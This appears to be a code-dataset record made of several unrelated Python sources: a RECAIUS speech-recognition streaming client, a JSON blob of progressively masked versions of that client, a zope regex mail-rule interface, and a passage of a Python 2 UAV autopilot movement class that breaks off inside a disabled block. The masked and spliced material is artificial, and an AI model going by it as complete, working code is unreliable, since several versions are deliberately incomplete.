        # Fresh authentication per session; the token given to start() is
        # not reused here.
        token = self._authenticate()['token']
        uuid = self._start_recognition(token)['uuid']
        logger.info('start transcode')
        # voice_id: incremented for every uploaded chunk.
        i = 1
        while True:
            arr = self._stream_generator()
            if(arr is None):
                break
            # logger.debug(f'{len(arr)} , {self._queue.qsize()}')
            # Concatenate the queued int16 chunks into one contiguous buffer.
            inline = np.hstack(arr)
            arr_bytes = inline.tobytes('C')
            header = {
                'Content-Type': 'multipart/form-data',
                'X-Token': token
            }
            files = {
                'voice_id': ('', i, ''),
                'voice': ('', arr_bytes, 'application/octet-stream')
            }
            resp = requests.put(
                f'{VOICE_URL}/{uuid}', headers=header, files=files)
            if(resp.status_code == 200):
                logger.debug(resp.json())
                result = resp.json()[0]
                # Both partial (TMP_RESULT) and final (RESULT) hypotheses
                # update the published transcript.
                if(result[0] == 'TMP_RESULT' or result[0] == 'RESULT'):
                    self._write_result(result[1])
            # Incremented even when the upload failed, so voice_ids stay
            # monotonic across retries.
            i = i + 1
        # End-of-stream: flush buffered audio server-side, then poll until
        # the server reports no more pending results.
        self._flush_recognition(uuid, token, i)
        while True:
            if(self._get_result(uuid, token) is None):
                break
            time.sleep(0.1)
        self._end_recognition(uuid, token)
        logger.info('end transcode')

    def _authenticate(self):
        """Request an API token; returns the parsed JSON response."""
        speechrecog_jajp_id = model.key.RECAIUS_ID
        speechrecog_jajp_password = model.key.RECAIUS_PASSWORD
        param = {
            "speech_recog_jaJP": {
                'service_id': speechrecog_jajp_id,
                'password': speechrecog_jajp_password
            }
        }
        return requests.post(AUTH_URL, json=param).json()

    def _flush_recognition(self, uuid, token, i):
        """Tell the server no audio beyond voice_id ``i`` will arrive.

        Returns the parsed JSON response on HTTP 200, otherwise ``None``.
        """
        header = {
            'Content-Type': 'application/json',
            'X-Token': token
        }
        param = {
            'voice_id': i,
        }
        resp = requests.put(
            f'{VOICE_URL}/{uuid}/flush', headers=header, json=param)
        if(resp.status_code == 200):
            logger.debug(f'frush result:{resp.json()}')
            return resp.json()
        else:
            logger.debug(f'flush result(status:{resp.status_code})')

    def _get_result(self, uuid, token):
        """Poll pending results; returns parsed JSON on 200, else ``None``."""
        header = {
            'X-Token': token
        }
        resp = requests.get(f'{VOICE_URL}/{uuid}/results', headers=header)
        if(resp.status_code == 200):
            logger.debug(f'get result:{resp.json()}')
            return resp.json()
        else:
            logger.debug(f'get result(status:{resp.status_code})')

    def _stream_generator(self):
        """Drain queued audio into a list of int16 numpy arrays.

        Blocks (polling every 0.1 s) until at least one chunk is available.
        Returns ``None`` when the ``None`` end-of-stream sentinel is seen.
        """
        arr = []
        while True:
            try:
                v = self._queue.get_nowait()
                # print(v)
                if v is None:
                    return None
                # Scale float samples to int16 PCM — assumes the producer
                # delivers samples normalized to [-1.0, 1.0]; TODO confirm.
                arr.append((v * 32767).astype(np.int16))
            except queue.Empty:
                if(len(arr) != 0):
                    break
                else:
                    time.sleep(0.1)
        return arr

    def _start_recognition(self, token):
        """Open a recognition session; returns parsed JSON containing 'uuid'."""
        header = {
            'Content-Type': 'application/json',
            'X-Token': token
        }
        param = {
            'model_id': 1
        }
        return requests.post(VOICE_URL, headers=header, json=param).json()

    def _end_recognition(self, uuid, token):
        """Delete the recognition session on the server (expects HTTP 204)."""
        header = {
            'X-Token': token
        }
        resp = requests.delete(f'{VOICE_URL}/{uuid}', headers=header)
        if(resp.status_code == 204):
            logger.debug(f'delete result(status:{resp.status_code})')

    def _write_result(self, transcipt):
        """Store the newest recognition text on ``self.transcript``."""
        self.transcript = transcipt
|
normal
|
{
"blob_id": "421b0c1871350ff541b4e56d1e18d77016884552",
"index": 5199,
"step-1": "<mask token>\n\n\nclass Transcoder:\n <mask token>\n\n def __init__(self):\n \"\"\"Constructor.\"\"\"\n logger.info('__init__:Enter')\n self._token = None\n self.transcript = None\n self._queue = queue.Queue()\n\n def start(self, token):\n \"\"\"Start recognition.\"\"\"\n logger.info('start:Enter')\n self._token = token\n threading.Thread(target=self._process).start()\n <mask token>\n\n def _process(self):\n logger.info('_process:Enter')\n token = self._authenticate()['token']\n uuid = self._start_recognition(token)['uuid']\n logger.info('start transcode')\n i = 1\n while True:\n arr = self._stream_generator()\n if arr is None:\n break\n inline = np.hstack(arr)\n arr_bytes = inline.tobytes('C')\n header = {'Content-Type': 'multipart/form-data', 'X-Token': token}\n files = {'voice_id': ('', i, ''), 'voice': ('', arr_bytes,\n 'application/octet-stream')}\n resp = requests.put(f'{VOICE_URL}/{uuid}', headers=header,\n files=files)\n if resp.status_code == 200:\n logger.debug(resp.json())\n result = resp.json()[0]\n if result[0] == 'TMP_RESULT' or result[0] == 'RESULT':\n self._write_result(result[1])\n i = i + 1\n self._flush_recognition(uuid, token, i)\n while True:\n if self._get_result(uuid, token) is None:\n break\n time.sleep(0.1)\n self._end_recognition(uuid, token)\n logger.info('end transcode')\n\n def _authenticate(self):\n speechrecog_jajp_id = model.key.RECAIUS_ID\n speechrecog_jajp_password = model.key.RECAIUS_PASSWORD\n param = {'speech_recog_jaJP': {'service_id': speechrecog_jajp_id,\n 'password': speechrecog_jajp_password}}\n return requests.post(AUTH_URL, json=param).json()\n\n def _flush_recognition(self, uuid, token, i):\n header = {'Content-Type': 'application/json', 'X-Token': token}\n param = {'voice_id': i}\n resp = requests.put(f'{VOICE_URL}/{uuid}/flush', headers=header,\n json=param)\n if resp.status_code == 200:\n logger.debug(f'frush result:{resp.json()}')\n return resp.json()\n else:\n logger.debug(f'flush 
result(status:{resp.status_code})')\n <mask token>\n <mask token>\n\n def _start_recognition(self, token):\n header = {'Content-Type': 'application/json', 'X-Token': token}\n param = {'model_id': 1}\n return requests.post(VOICE_URL, headers=header, json=param).json()\n\n def _end_recognition(self, uuid, token):\n header = {'X-Token': token}\n resp = requests.delete(f'{VOICE_URL}/{uuid}', headers=header)\n if resp.status_code == 204:\n logger.debug(f'delete result(status:{resp.status_code})')\n\n def _write_result(self, transcipt):\n self.transcript = transcipt\n",
"step-2": "<mask token>\n\n\nclass Transcoder:\n <mask token>\n\n def __init__(self):\n \"\"\"Constructor.\"\"\"\n logger.info('__init__:Enter')\n self._token = None\n self.transcript = None\n self._queue = queue.Queue()\n\n def start(self, token):\n \"\"\"Start recognition.\"\"\"\n logger.info('start:Enter')\n self._token = token\n threading.Thread(target=self._process).start()\n\n def write_stream(self, buf):\n \"\"\"Write audio stream.\"\"\"\n self._queue.put(buf)\n\n def _process(self):\n logger.info('_process:Enter')\n token = self._authenticate()['token']\n uuid = self._start_recognition(token)['uuid']\n logger.info('start transcode')\n i = 1\n while True:\n arr = self._stream_generator()\n if arr is None:\n break\n inline = np.hstack(arr)\n arr_bytes = inline.tobytes('C')\n header = {'Content-Type': 'multipart/form-data', 'X-Token': token}\n files = {'voice_id': ('', i, ''), 'voice': ('', arr_bytes,\n 'application/octet-stream')}\n resp = requests.put(f'{VOICE_URL}/{uuid}', headers=header,\n files=files)\n if resp.status_code == 200:\n logger.debug(resp.json())\n result = resp.json()[0]\n if result[0] == 'TMP_RESULT' or result[0] == 'RESULT':\n self._write_result(result[1])\n i = i + 1\n self._flush_recognition(uuid, token, i)\n while True:\n if self._get_result(uuid, token) is None:\n break\n time.sleep(0.1)\n self._end_recognition(uuid, token)\n logger.info('end transcode')\n\n def _authenticate(self):\n speechrecog_jajp_id = model.key.RECAIUS_ID\n speechrecog_jajp_password = model.key.RECAIUS_PASSWORD\n param = {'speech_recog_jaJP': {'service_id': speechrecog_jajp_id,\n 'password': speechrecog_jajp_password}}\n return requests.post(AUTH_URL, json=param).json()\n\n def _flush_recognition(self, uuid, token, i):\n header = {'Content-Type': 'application/json', 'X-Token': token}\n param = {'voice_id': i}\n resp = requests.put(f'{VOICE_URL}/{uuid}/flush', headers=header,\n json=param)\n if resp.status_code == 200:\n logger.debug(f'frush result:{resp.json()}')\n 
return resp.json()\n else:\n logger.debug(f'flush result(status:{resp.status_code})')\n <mask token>\n <mask token>\n\n def _start_recognition(self, token):\n header = {'Content-Type': 'application/json', 'X-Token': token}\n param = {'model_id': 1}\n return requests.post(VOICE_URL, headers=header, json=param).json()\n\n def _end_recognition(self, uuid, token):\n header = {'X-Token': token}\n resp = requests.delete(f'{VOICE_URL}/{uuid}', headers=header)\n if resp.status_code == 204:\n logger.debug(f'delete result(status:{resp.status_code})')\n\n def _write_result(self, transcipt):\n self.transcript = transcipt\n",
"step-3": "<mask token>\n\n\nclass Transcoder:\n <mask token>\n\n def __init__(self):\n \"\"\"Constructor.\"\"\"\n logger.info('__init__:Enter')\n self._token = None\n self.transcript = None\n self._queue = queue.Queue()\n\n def start(self, token):\n \"\"\"Start recognition.\"\"\"\n logger.info('start:Enter')\n self._token = token\n threading.Thread(target=self._process).start()\n\n def write_stream(self, buf):\n \"\"\"Write audio stream.\"\"\"\n self._queue.put(buf)\n\n def _process(self):\n logger.info('_process:Enter')\n token = self._authenticate()['token']\n uuid = self._start_recognition(token)['uuid']\n logger.info('start transcode')\n i = 1\n while True:\n arr = self._stream_generator()\n if arr is None:\n break\n inline = np.hstack(arr)\n arr_bytes = inline.tobytes('C')\n header = {'Content-Type': 'multipart/form-data', 'X-Token': token}\n files = {'voice_id': ('', i, ''), 'voice': ('', arr_bytes,\n 'application/octet-stream')}\n resp = requests.put(f'{VOICE_URL}/{uuid}', headers=header,\n files=files)\n if resp.status_code == 200:\n logger.debug(resp.json())\n result = resp.json()[0]\n if result[0] == 'TMP_RESULT' or result[0] == 'RESULT':\n self._write_result(result[1])\n i = i + 1\n self._flush_recognition(uuid, token, i)\n while True:\n if self._get_result(uuid, token) is None:\n break\n time.sleep(0.1)\n self._end_recognition(uuid, token)\n logger.info('end transcode')\n\n def _authenticate(self):\n speechrecog_jajp_id = model.key.RECAIUS_ID\n speechrecog_jajp_password = model.key.RECAIUS_PASSWORD\n param = {'speech_recog_jaJP': {'service_id': speechrecog_jajp_id,\n 'password': speechrecog_jajp_password}}\n return requests.post(AUTH_URL, json=param).json()\n\n def _flush_recognition(self, uuid, token, i):\n header = {'Content-Type': 'application/json', 'X-Token': token}\n param = {'voice_id': i}\n resp = requests.put(f'{VOICE_URL}/{uuid}/flush', headers=header,\n json=param)\n if resp.status_code == 200:\n logger.debug(f'frush result:{resp.json()}')\n 
return resp.json()\n else:\n logger.debug(f'flush result(status:{resp.status_code})')\n\n def _get_result(self, uuid, token):\n header = {'X-Token': token}\n resp = requests.get(f'{VOICE_URL}/{uuid}/results', headers=header)\n if resp.status_code == 200:\n logger.debug(f'get result:{resp.json()}')\n return resp.json()\n else:\n logger.debug(f'get result(status:{resp.status_code})')\n\n def _stream_generator(self):\n arr = []\n while True:\n try:\n v = self._queue.get_nowait()\n if v is None:\n return None\n arr.append((v * 32767).astype(np.int16))\n except queue.Empty:\n if len(arr) != 0:\n break\n else:\n time.sleep(0.1)\n return arr\n\n def _start_recognition(self, token):\n header = {'Content-Type': 'application/json', 'X-Token': token}\n param = {'model_id': 1}\n return requests.post(VOICE_URL, headers=header, json=param).json()\n\n def _end_recognition(self, uuid, token):\n header = {'X-Token': token}\n resp = requests.delete(f'{VOICE_URL}/{uuid}', headers=header)\n if resp.status_code == 204:\n logger.debug(f'delete result(status:{resp.status_code})')\n\n def _write_result(self, transcipt):\n self.transcript = transcipt\n",
"step-4": "<mask token>\nAUTH_URL = 'https://api.recaius.jp/auth/v2/tokens'\nVOICE_URL = 'https://api.recaius.jp/asr/v2/voices'\n\n\nclass Transcoder:\n \"\"\"Transcoder Class.\"\"\"\n\n def __init__(self):\n \"\"\"Constructor.\"\"\"\n logger.info('__init__:Enter')\n self._token = None\n self.transcript = None\n self._queue = queue.Queue()\n\n def start(self, token):\n \"\"\"Start recognition.\"\"\"\n logger.info('start:Enter')\n self._token = token\n threading.Thread(target=self._process).start()\n\n def write_stream(self, buf):\n \"\"\"Write audio stream.\"\"\"\n self._queue.put(buf)\n\n def _process(self):\n logger.info('_process:Enter')\n token = self._authenticate()['token']\n uuid = self._start_recognition(token)['uuid']\n logger.info('start transcode')\n i = 1\n while True:\n arr = self._stream_generator()\n if arr is None:\n break\n inline = np.hstack(arr)\n arr_bytes = inline.tobytes('C')\n header = {'Content-Type': 'multipart/form-data', 'X-Token': token}\n files = {'voice_id': ('', i, ''), 'voice': ('', arr_bytes,\n 'application/octet-stream')}\n resp = requests.put(f'{VOICE_URL}/{uuid}', headers=header,\n files=files)\n if resp.status_code == 200:\n logger.debug(resp.json())\n result = resp.json()[0]\n if result[0] == 'TMP_RESULT' or result[0] == 'RESULT':\n self._write_result(result[1])\n i = i + 1\n self._flush_recognition(uuid, token, i)\n while True:\n if self._get_result(uuid, token) is None:\n break\n time.sleep(0.1)\n self._end_recognition(uuid, token)\n logger.info('end transcode')\n\n def _authenticate(self):\n speechrecog_jajp_id = model.key.RECAIUS_ID\n speechrecog_jajp_password = model.key.RECAIUS_PASSWORD\n param = {'speech_recog_jaJP': {'service_id': speechrecog_jajp_id,\n 'password': speechrecog_jajp_password}}\n return requests.post(AUTH_URL, json=param).json()\n\n def _flush_recognition(self, uuid, token, i):\n header = {'Content-Type': 'application/json', 'X-Token': token}\n param = {'voice_id': i}\n resp = 
requests.put(f'{VOICE_URL}/{uuid}/flush', headers=header,\n json=param)\n if resp.status_code == 200:\n logger.debug(f'frush result:{resp.json()}')\n return resp.json()\n else:\n logger.debug(f'flush result(status:{resp.status_code})')\n\n def _get_result(self, uuid, token):\n header = {'X-Token': token}\n resp = requests.get(f'{VOICE_URL}/{uuid}/results', headers=header)\n if resp.status_code == 200:\n logger.debug(f'get result:{resp.json()}')\n return resp.json()\n else:\n logger.debug(f'get result(status:{resp.status_code})')\n\n def _stream_generator(self):\n arr = []\n while True:\n try:\n v = self._queue.get_nowait()\n if v is None:\n return None\n arr.append((v * 32767).astype(np.int16))\n except queue.Empty:\n if len(arr) != 0:\n break\n else:\n time.sleep(0.1)\n return arr\n\n def _start_recognition(self, token):\n header = {'Content-Type': 'application/json', 'X-Token': token}\n param = {'model_id': 1}\n return requests.post(VOICE_URL, headers=header, json=param).json()\n\n def _end_recognition(self, uuid, token):\n header = {'X-Token': token}\n resp = requests.delete(f'{VOICE_URL}/{uuid}', headers=header)\n if resp.status_code == 204:\n logger.debug(f'delete result(status:{resp.status_code})')\n\n def _write_result(self, transcipt):\n self.transcript = transcipt\n",
"step-5": "# -*- coding: utf-8 -*-\n\"\"\"Transcoder with TOSHIBA RECAIUS API.\"\"\"\nimport threading\nimport queue\nimport time\n\nimport numpy as np\nfrom logzero import logger\nimport requests\n\nimport model.key\n\nAUTH_URL = 'https://api.recaius.jp/auth/v2/tokens'\nVOICE_URL = 'https://api.recaius.jp/asr/v2/voices'\n\n\nclass Transcoder:\n \"\"\"Transcoder Class.\"\"\"\n\n def __init__(self):\n \"\"\"Constructor.\"\"\"\n logger.info('__init__:Enter')\n self._token = None\n self.transcript = None\n self._queue = queue.Queue()\n\n def start(self, token):\n \"\"\"Start recognition.\"\"\"\n logger.info('start:Enter')\n self._token = token\n threading.Thread(target=self._process).start()\n\n def write_stream(self, buf):\n \"\"\"Write audio stream.\"\"\"\n self._queue.put(buf)\n\n def _process(self):\n logger.info('_process:Enter')\n token = self._authenticate()['token']\n uuid = self._start_recognition(token)['uuid']\n logger.info('start transcode')\n i = 1\n while True:\n arr = self._stream_generator()\n if(arr is None):\n break\n # logger.debug(f'{len(arr)} , {self._queue.qsize()}')\n inline = np.hstack(arr)\n arr_bytes = inline.tobytes('C')\n header = {\n 'Content-Type': 'multipart/form-data',\n 'X-Token': token\n }\n files = {\n 'voice_id': ('', i, ''),\n 'voice': ('', arr_bytes, 'application/octet-stream')\n }\n resp = requests.put(\n f'{VOICE_URL}/{uuid}', headers=header, files=files)\n if(resp.status_code == 200):\n logger.debug(resp.json())\n result = resp.json()[0]\n if(result[0] == 'TMP_RESULT' or result[0] == 'RESULT'):\n self._write_result(result[1])\n i = i + 1\n self._flush_recognition(uuid, token, i)\n while True:\n if(self._get_result(uuid, token) is None):\n break\n time.sleep(0.1)\n self._end_recognition(uuid, token)\n logger.info('end transcode')\n\n def _authenticate(self):\n speechrecog_jajp_id = model.key.RECAIUS_ID\n speechrecog_jajp_password = model.key.RECAIUS_PASSWORD\n param = {\n \"speech_recog_jaJP\": {\n 'service_id': 
speechrecog_jajp_id,\n 'password': speechrecog_jajp_password\n }\n }\n return requests.post(AUTH_URL, json=param).json()\n\n def _flush_recognition(self, uuid, token, i):\n header = {\n 'Content-Type': 'application/json',\n 'X-Token': token\n }\n param = {\n 'voice_id': i,\n }\n resp = requests.put(\n f'{VOICE_URL}/{uuid}/flush', headers=header, json=param)\n if(resp.status_code == 200):\n logger.debug(f'frush result:{resp.json()}')\n return resp.json()\n else:\n logger.debug(f'flush result(status:{resp.status_code})')\n\n def _get_result(self, uuid, token):\n header = {\n 'X-Token': token\n }\n resp = requests.get(f'{VOICE_URL}/{uuid}/results', headers=header)\n if(resp.status_code == 200):\n logger.debug(f'get result:{resp.json()}')\n return resp.json()\n else:\n logger.debug(f'get result(status:{resp.status_code})')\n\n def _stream_generator(self):\n arr = []\n while True:\n try:\n v = self._queue.get_nowait()\n # print(v)\n if v is None:\n return None\n arr.append((v * 32767).astype(np.int16))\n except queue.Empty:\n if(len(arr) != 0):\n break\n else:\n time.sleep(0.1)\n return arr\n\n def _start_recognition(self, token):\n header = {\n 'Content-Type': 'application/json',\n 'X-Token': token\n }\n param = {\n 'model_id': 1\n }\n return requests.post(VOICE_URL, headers=header, json=param).json()\n\n def _end_recognition(self, uuid, token):\n header = {\n 'X-Token': token\n }\n resp = requests.delete(f'{VOICE_URL}/{uuid}', headers=header)\n if(resp.status_code == 204):\n logger.debug(f'delete result(status:{resp.status_code})')\n\n def _write_result(self, transcipt):\n self.transcript = transcipt\n",
"step-ids": [
9,
10,
12,
14,
16
]
}
|
[
9,
10,
12,
14,
16
] |
from zope import schema
from zope import interface
from zope import component
from raptus.mailcone.rules_regex import _
from raptus.mailcone.rules import interfaces
class IRegexItem(interfaces.IConditionItem):
    """Condition item that matches mails with a regular expression."""

    # the regular expression applied to the selected source attribute
    regex = schema.TextLine(
        title=_('Regex'),
        required=True,
        description=_('a regular expression'),
    )

    # which mail attribute the regex is matched against
    source = schema.Choice(
        title=_('Source'),
        vocabulary='raptus.mailcone.mails.mailattributes',
        required=True,
    )
|
normal
|
{
"blob_id": "fe83b45bdc5970d63deab66b26b16752cd8ad8ef",
"index": 7241,
"step-1": "<mask token>\n\n\nclass IRegexItem(interfaces.IConditionItem):\n <mask token>\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass IRegexItem(interfaces.IConditionItem):\n <mask token>\n regex = schema.TextLine(title=_('Regex'), required=True, description=_(\n 'a regular expression'))\n source = schema.Choice(title=_('Source'), vocabulary=\n 'raptus.mailcone.mails.mailattributes', required=True)\n",
"step-3": "<mask token>\n\n\nclass IRegexItem(interfaces.IConditionItem):\n \"\"\" Interface for regex match filter\n \"\"\"\n regex = schema.TextLine(title=_('Regex'), required=True, description=_(\n 'a regular expression'))\n source = schema.Choice(title=_('Source'), vocabulary=\n 'raptus.mailcone.mails.mailattributes', required=True)\n",
"step-4": "from zope import schema\nfrom zope import interface\nfrom zope import component\nfrom raptus.mailcone.rules_regex import _\nfrom raptus.mailcone.rules import interfaces\n\n\nclass IRegexItem(interfaces.IConditionItem):\n \"\"\" Interface for regex match filter\n \"\"\"\n regex = schema.TextLine(title=_('Regex'), required=True, description=_(\n 'a regular expression'))\n source = schema.Choice(title=_('Source'), vocabulary=\n 'raptus.mailcone.mails.mailattributes', required=True)\n",
"step-5": null,
"step-ids": [
1,
2,
3,
4
]
}
|
[
1,
2,
3,
4
] |
"""
___________________________________________________
| _____ _____ _ _ _ |
| | __ \ | __ (_) | | | |
| | |__) |__ _ __ __ _ _ _| |__) || | ___ | |_ |
| | ___/ _ \ '_ \ / _` | | | | ___/ | |/ _ \| __| |
| | | | __/ | | | (_| | |_| | | | | | (_) | |_ |
| |_| \___|_| |_|\__, |\__,_|_| |_|_|\___/ \__| |
| __/ | |
| GNU/Linux based |___/ Multi-Rotor UAV Autopilot |
|___________________________________________________|
Movement Activity Class
Copyright (C) 2014 Tobias Simon, Integrated Communication Systems Group, TU Ilmenau
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details. """
from math import hypot
from time import sleep
from util.geomath import LinearInterpolation
from numpy import array, zeros
from pilot_pb2 import *
from activity import Activity, StabMixIn
from util.geomath import gps_add_meters, gps_meters_offset
from util.srtm import SrtmElevMap
# Module-level SRTM elevation map, created once at import time and shared.
# NOTE(review): currently only referenced from the disabled altitude code
# inside MoveActivity.run().
_srtm_elev_map = SrtmElevMap()
class MoveActivity(Activity, StabMixIn):
   """Activity that moves the UAV to a new position setpoint.

   The target may be given in local coordinates (meter offsets from the
   start position) or global GPS coordinates, each either absolute or
   relative to the previous setpoint.  NOTE: this module is Python 2 code
   (print statements, xrange).
   """

   # maximum climb/descent speed in m/s (used by the disabled altitude code):
   Z_SPEED_MAX = 2
   # safety margin in meters above the SRTM terrain elevation:
   SRTM_SAFETY_ALT = 20

   def __init__(self, icarus):
      """Constructor; icarus is the shared autopilot state object."""
      Activity.__init__(self, icarus)
      # cooperative cancellation flag, set by _cancel() and read by run():
      self.canceled = False

   def run(self):
      """Compute the new x, y, z setpoint and command the pilot to move."""
      # shortcut identifiers:
      arg = self.icarus.arg
      move_data = arg.move_data
      pilot = self.icarus.pilot
      params = pilot.params
      fsm = self.icarus.fsm
      prev_setp_rel = self.icarus.setpoints
      start_gps = (params.start_lat, params.start_lon)
      # previous setpoint converted from meter offsets to GPS coordinates:
      prev_setp_gps = gps_add_meters(start_gps, prev_setp_rel[0 : 2])
      # calculate target x, y, z and move
      coord = [None, None, None] # x, y, z setpoints
      if arg.glob:
         # collect global lat, lon, alt from the request; fields not present
         # stay None and are resolved against the previous setpoint below:
         glob_sp = [None, None, None]
         for i in xrange(3):
            name = 'p%d' % i
            if move_data.HasField(name):
               glob_sp[i] = getattr(move_data, name)
         print 'p0, p1, p2 = ', glob_sp
         if arg.rel:
            print 'glob, rel'
            # interpret lat, lon, alt as relative offsets
            # convert previous x and y setpoints to GPS, using start_lat, start_lon:
            gps = list(prev_setp_gps)
            for i in range(0, 2):
               if glob_sp[i] != None:
                  gps[i] += glob_sp[i]
            # convert from wgs84 back to meter offsets:
            coord[0 : 2] = gps_meters_offset(start_gps, gps)
            # add z value:
            coord[2] = prev_setp_rel[2]
            if glob_sp[2] != None:
               coord[2] += glob_sp[2]
         else:
            print 'glob, abs'
            # interpret lat, lon, alt as absolute; missing lat/lon fall back
            # to the previous setpoint position:
            for i in range(0, 2):
               if glob_sp[i] == None:
                  glob_sp[i] = prev_setp_gps[i]
            print start_gps, glob_sp[0 : 2]
            coord[0 : 2] = gps_meters_offset(start_gps, glob_sp[0 : 2])
            if glob_sp[2] != None:
               # absolute altitude is stored relative to the start altitude:
               coord[2] = glob_sp[2] - params.start_alt
            else:
               coord[2] = prev_setp_rel[2]
      else:
         # local position update:
         for i in xrange(3):
            name = 'p%d' % i
            if move_data.HasField(name):
               if arg.rel:
                  print 'local, rel'
                  # relative local coordinate:
                  coord[i] = prev_setp_rel[i] + getattr(move_data, name)
               else:
                  print 'local, abs'
                  # absolute local coordinate:
                  coord[i] = getattr(move_data, name)
            else:
               # field not present; keep previous setpoint component:
               coord[i] = prev_setp_rel[i]
      print 'coord output:', coord
      self.icarus.setpoints = coord
      # set position
      pilot.set_ctrl_param(POS_E, coord[0])
      pilot.set_ctrl_param(POS_N, coord[1])
      # NOTE(review): the block below is disabled (kept as a bare string
      # literal); it references names that do not exist in this scope
      # (start_z, srtm_alt) and would need fixing before re-enabling.
      """
      # did the altitude change?:
      if coord[2] != prev_setp_rel[2]:
         # set up linear z interpolation between start and destination points:
         dist = hypot(prev_setp_rel[0] - coord[0], prev_setp_rel[1] - coord[1])
         z_interp = LinearInterpolation(0.0, start_z, dist, coord[2]) 
         # update z setpoint linearly between starting position and destination:
         target_dist = hypot(pilot.mon[5], pilot.mon[6])
         while target_dist > self.LAT_STAB_EPSILON:
            sleep(1)
            if self.canceled:
               pilot.set_ctrl_param(POS_N, pilot.mon[0])
               pilot.set_ctrl_param(POS_E, pilot.mon[1])
               pilot.set_ctrl_param(POS_U, pilot.mon[2])
               self.stabilize()
               return # not going into hovering state
            z = z_interp(dist - target_dist)
            # check elevation map:
            srtm_z = 1000.0 #_srtm_elev_map.lookup(lat, lon) - params.start_alt
            if z < srtm_alt + self.SRTM_SAFETY_ALT:
               z = srtm_alt + self.SRTM_SAFETY_ALT
            pilot.set_ctrl_param(POS_Z, z)
      """
      # block until the position controller has settled on the new setpoint:
      self.stabilize()
      if not self.canceled:
         fsm.handle('done')

   def _cancel(self):
      # cooperative cancellation; run() checks this flag after stabilizing:
      self.canceled = True
|
normal
|
{
"blob_id": "81f49c55edff7678e9d1745e39a8370e2c31c9ea",
"index": 8850,
"step-1": "\"\"\"\n ___________________________________________________\n | _____ _____ _ _ _ |\n | | __ \\ | __ (_) | | | |\n | | |__) |__ _ __ __ _ _ _| |__) || | ___ | |_ |\n | | ___/ _ \\ '_ \\ / _` | | | | ___/ | |/ _ \\| __| |\n | | | | __/ | | | (_| | |_| | | | | | (_) | |_ |\n | |_| \\___|_| |_|\\__, |\\__,_|_| |_|_|\\___/ \\__| |\n | __/ | |\n | GNU/Linux based |___/ Multi-Rotor UAV Autopilot |\n |___________________________________________________|\n \n Movement Activity Class\n\n Copyright (C) 2014 Tobias Simon, Integrated Communication Systems Group, TU Ilmenau\n\n This program is free software; you can redistribute it and/or modify\n it under the terms of the GNU General Public License as published by\n the Free Software Foundation; either version 2 of the License, or\n (at your option) any later version.\n\n This program is distributed in the hope that it will be useful,\n but WITHOUT ANY WARRANTY; without even the implied warranty of\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n GNU General Public License for more details. 
\"\"\"\n\n\nfrom math import hypot\nfrom time import sleep\nfrom util.geomath import LinearInterpolation\nfrom numpy import array, zeros\nfrom pilot_pb2 import *\nfrom activity import Activity, StabMixIn\nfrom util.geomath import gps_add_meters, gps_meters_offset\nfrom util.srtm import SrtmElevMap\n\n\n_srtm_elev_map = SrtmElevMap()\n\n\nclass MoveActivity(Activity, StabMixIn):\n\n\n Z_SPEED_MAX = 2\n SRTM_SAFETY_ALT = 20\n\n\n def __init__(self, icarus):\n Activity.__init__(self, icarus)\n self.canceled = False\n\n\n def run(self):\n # shortcut identifiers:\n arg = self.icarus.arg\n move_data = arg.move_data\n pilot = self.icarus.pilot\n params = pilot.params\n fsm = self.icarus.fsm\n prev_setp_rel = self.icarus.setpoints\n start_gps = (params.start_lat, params.start_lon)\n prev_setp_gps = gps_add_meters(start_gps, prev_setp_rel[0 : 2])\n \n # calculate target x, y, z and move\n coord = [None, None, None] # x, y, z setpoints\n if arg.glob:\n # set global lat, lon postion:\n glob_sp = [None, None, None]\n for i in xrange(3):\n name = 'p%d' % i\n if move_data.HasField(name):\n glob_sp[i] = getattr(move_data, name)\n print 'p0, p1, p2 = ', glob_sp\n if arg.rel:\n print 'glob, rel'\n # interpret lat, lon, alt as relative\n # covert previous x and y setpoints to rad, using start_lat, start_lon:\n gps = list(prev_setp_gps)\n for i in range(0, 2):\n if glob_sp[i] != None:\n gps[i] += glob_sp[i]\n # convert from wsg84 to relative:\n coord[0 : 2] = gps_meters_offset(start_gps, gps)\n # add z value:\n coord[2] = prev_setp_rel[2]\n if glob_sp[2] != None:\n coord[2] += glob_sp[2]\n else:\n print 'glob, abs'\n # interpret lat, lon, alt as absolute\n for i in range(0, 2):\n if glob_sp[i] == None:\n glob_sp[i] = prev_setp_gps[i]\n print start_gps, glob_sp[0 : 2]\n coord[0 : 2] = gps_meters_offset(start_gps, glob_sp[0 : 2])\n if glob_sp[2] != None:\n coord[2] = glob_sp[2] - params.start_alt\n else:\n coord[2] = prev_setp_rel[2]\n else:\n # local position update:\n for i in 
xrange(3):\n name = 'p%d' % i\n if move_data.HasField(name):\n if arg.rel:\n print 'local, rel'\n # relative local coordinate:\n coord[i] = prev_setp_rel[i] + getattr(move_data, name)\n else:\n print 'local, abs'\n # absolute local coordinate:\n coord[i] = getattr(move_data, name)\n else:\n coord[i] = prev_setp_rel[i]\n \n print 'coord output:', coord\n self.icarus.setpoints = coord\n # set position\n pilot.set_ctrl_param(POS_E, coord[0])\n pilot.set_ctrl_param(POS_N, coord[1])\n \n \"\"\"\n # did the altitude change?:\n if coord[2] != prev_setp_rel[2]:\n # set up linear z interpolation between start and destination points:\n dist = hypot(prev_setp_rel[0] - coord[0], prev_setp_rel[1] - coord[1])\n z_interp = LinearInterpolation(0.0, start_z, dist, coord[2]) \n # update z setpoint linearly between starting position and destination:\n target_dist = hypot(pilot.mon[5], pilot.mon[6])\n while target_dist > self.LAT_STAB_EPSILON:\n sleep(1)\n if self.canceled:\n pilot.set_ctrl_param(POS_N, pilot.mon[0])\n pilot.set_ctrl_param(POS_E, pilot.mon[1])\n pilot.set_ctrl_param(POS_U, pilot.mon[2])\n self.stabilize()\n return # not going into hovering state\n z = z_interp(dist - target_dist)\n # check elevation map:\n srtm_z = 1000.0 #_srtm_elev_map.lookup(lat, lon) - params.start_alt\n if z < srtm_alt + self.SRTM_SAFETY_ALT:\n z = srtm_alt + self.SRTM_SAFETY_ALT\n pilot.set_ctrl_param(POS_Z, z)\n 